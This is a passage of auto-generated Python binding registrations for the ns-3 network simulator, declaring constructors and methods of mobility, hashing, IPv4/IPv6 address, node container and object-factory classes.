ns3::Vector ns3::ConstantVelocityHelper::GetVelocity() const [member function] cls.add_method('GetVelocity', 'ns3::Vector', [], is_const=True) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::Pause() [member function] cls.add_method('Pause', 'void', []) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::SetPosition(ns3::Vector const & position) [member function] cls.add_method('SetPosition', 'void', [param('ns3::Vector const &', 'position')]) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::SetVelocity(ns3::Vector const & vel) [member function] cls.add_method('SetVelocity', 'void', [param('ns3::Vector const &', 'vel')]) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::Unpause() [member function] cls.add_method('Unpause', 'void', []) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::Update() const [member function] cls.add_method('Update', 'void', [], is_const=True) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::UpdateWithBounds(ns3::Rectangle const & rectangle) const [member function] cls.add_method('UpdateWithBounds', 'void', [param('ns3::Rectangle const &', 'rectangle')], is_const=True) ## constant-velocity-helper.h (module 'mobility'): void ns3::ConstantVelocityHelper::UpdateWithBounds(ns3::Box const & bounds) const [member function] cls.add_method('UpdateWithBounds', 'void', [param('ns3::Box const &', 'bounds')], is_const=True) return def register_Ns3Hasher_methods(root_module, cls): ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hasher const &', 'arg0')]) ## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor] cls.add_constructor([]) ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')]) ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')]) ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function] cls.add_method('GetHash32', 'uint32_t', [param('std::string const', 's')]) ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')]) ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function] cls.add_method('GetHash64', 'uint64_t', [param('std::string const', 's')]) ## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function] cls.add_method('clear', 'ns3::Hasher &', []) return def register_Ns3Ipv4Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor] cls.add_constructor([param('uint32_t', 'address')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor] cls.add_constructor([param('char const *', 'address')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('CombineMask', 'ns3::Ipv4Address', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Ipv4Address', [param('ns3::Address const &', 'address')], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function] cls.add_method('Deserialize', 'ns3::Ipv4Address', [param('uint8_t const *', 'buf')], is_static=True) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function] cls.add_method('Get', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function] cls.add_method('GetAny', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function] cls.add_method('GetBroadcast', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('GetSubnetDirectedBroadcast', 'ns3::Ipv4Address', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsAny() const [member function] cls.add_method('IsAny', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function] cls.add_method('IsBroadcast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv4Address const &', 'other')], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function] cls.add_method('IsLocalMulticast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalhost() const [member function] cls.add_method('IsLocalhost', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('IsSubnetDirectedBroadcast', 'bool', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function] cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function] cls.add_method('Set', 'void', [param('uint32_t', 'address')]) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function] cls.add_method('Set', 'void', [param('char const *', 'address')]) return def register_Ns3Ipv4Mask_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor] cls.add_constructor([param('uint32_t', 'mask')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor] cls.add_constructor([param('char const *', 'mask')]) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function] cls.add_method('Get', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function] cls.add_method('GetInverse', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function] cls.add_method('GetPrefixLength', 'uint16_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv4Mask', 'other')], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function] cls.add_method('IsMatch', 'bool', [param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function] cls.add_method('Set', 'void', [param('uint32_t', 'mask')]) return def register_Ns3Ipv6Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor] cls.add_constructor([param('char const *', 'address')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor] cls.add_constructor([param('uint8_t *', 'address')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor] cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor] cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function] cls.add_method('CombinePrefix', 'ns3::Ipv6Address', [param('ns3::Ipv6Prefix const &', 'prefix')]) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Ipv6Address', [param('ns3::Address const &', 'address')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function] cls.add_method('Deserialize', 'ns3::Ipv6Address', [param('uint8_t const *', 'buf')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function] cls.add_method('GetAllHostsMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function] cls.add_method('GetAllNodesMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function] cls.add_method('GetAllRoutersMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function] cls.add_method('GetAny', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function] cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function] cls.add_method('GetIpv4MappedAddress', 'ns3::Ipv4Address', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function] cls.add_method('IsAllHostsMulticast', 'bool', [], deprecated=True, is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function] cls.add_method('IsAllNodesMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function] cls.add_method('IsAllRoutersMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function] cls.add_method('IsAny', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsDocumentation() const [member function] cls.add_method('IsDocumentation', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv6Address const &', 'other')], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsIpv4MappedAddress() const [member function] cls.add_method('IsIpv4MappedAddress', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function] cls.add_method('IsLinkLocal', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function] cls.add_method('IsLinkLocalMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function] cls.add_method('IsLocalhost', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function] cls.add_method('IsSolicitedMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac16Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac16Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac64Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac64Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac16Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac16Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac48Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac64Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac64Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function] cls.add_method('MakeIpv4MappedAddress', 'ns3::Ipv6Address', [param('ns3::Ipv4Address', 'addr')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function] cls.add_method('MakeSolicitedAddress', 'ns3::Ipv6Address', [param('ns3::Ipv6Address', 'addr')], is_static=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function] cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function] cls.add_method('Set', 'void', [param('char const *', 'address')]) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function] cls.add_method('Set', 'void', [param('uint8_t *', 'address')]) return def register_Ns3Ipv6Prefix_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor] cls.add_constructor([param('uint8_t *', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor] cls.add_constructor([param('char const *', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor] cls.add_constructor([param('uint8_t', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor] cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor] cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')]) ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function] cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function] cls.add_method('GetPrefixLength', 'uint8_t', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv6Prefix const &', 'other')], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function] cls.add_method('IsMatch', 'bool', [param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) return def register_Ns3NodeContainer_methods(root_module, cls): ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor] cls.add_constructor([]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor] cls.add_constructor([param('std::string', 'nodeName')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function] cls.add_method('Add', 'void', [param('ns3::NodeContainer', 'other')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function] cls.add_method('Add', 'void', [param('ns3::Ptr< ns3::Node >', 'node')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function] cls.add_method('Add', 'void', [param('std::string', 'nodeName')]) ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<ns3::Ptr<ns3::Node> const*, std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function] cls.add_method('Begin', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node >, std::vector< ns3::Ptr< ns3::Node > > >', [], is_const=True) ## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n) [member function] cls.add_method('Create', 'void', [param('uint32_t', 'n')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function] cls.add_method('Create', 'void', [param('uint32_t', 'n'), param('uint32_t', 'systemId')]) ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<ns3::Ptr<ns3::Node> const*, std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function] cls.add_method('End', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node >, std::vector< ns3::Ptr< ns3::Node > > >', [], is_const=True) ## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function] cls.add_method('Get', 'ns3::Ptr< ns3::Node >', [param('uint32_t', 'i')], is_const=True) ## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function] cls.add_method('GetGlobal', 'ns3::NodeContainer', [], is_static=True) ## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) return def register_Ns3ObjectBase_methods(root_module, cls): ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor] cls.add_constructor([]) ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')]) ## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function] cls.add_method('GetAttribute', 'void', [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')], is_const=True) ## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & value) const [member function] cls.add_method('GetAttributeFailSafe', 'bool', [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')], is_const=True) ## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('SetAttribute', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('SetAttributeFailSafe', 'bool', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceConnect', 'bool', [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceConnectWithoutContext', 'bool', [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceDisconnect', 'bool', [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceDisconnectWithoutContext', 'bool', [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function] cls.add_method('ConstructSelf', 'void', [param('ns3::AttributeConstructionList const &', 'attributes')], visibility='protected') ## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function] cls.add_method('NotifyConstructionCompleted', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3ObjectDeleter_methods(root_module, cls): ## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor] cls.add_constructor([]) ## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')]) ## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function] cls.add_method('Delete', 'void', [param('ns3::Object *', 'object')], is_static=True) return def register_Ns3ObjectFactory_methods(root_module, cls): cls.add_output_stream_operator() ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')]) ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor] cls.add_constructor([param('std::string', 'typeId')]) ## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::Object >', [], is_const=True) ## object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True) ## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('Set', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function] cls.add_method('SetTypeId', 'void', [param('ns3::TypeId', 'tid')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function] cls.add_method('SetTypeId', 'void', [param('char const *', 'tid')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function] cls.add_method('SetTypeId', 'void', [param('std::string', 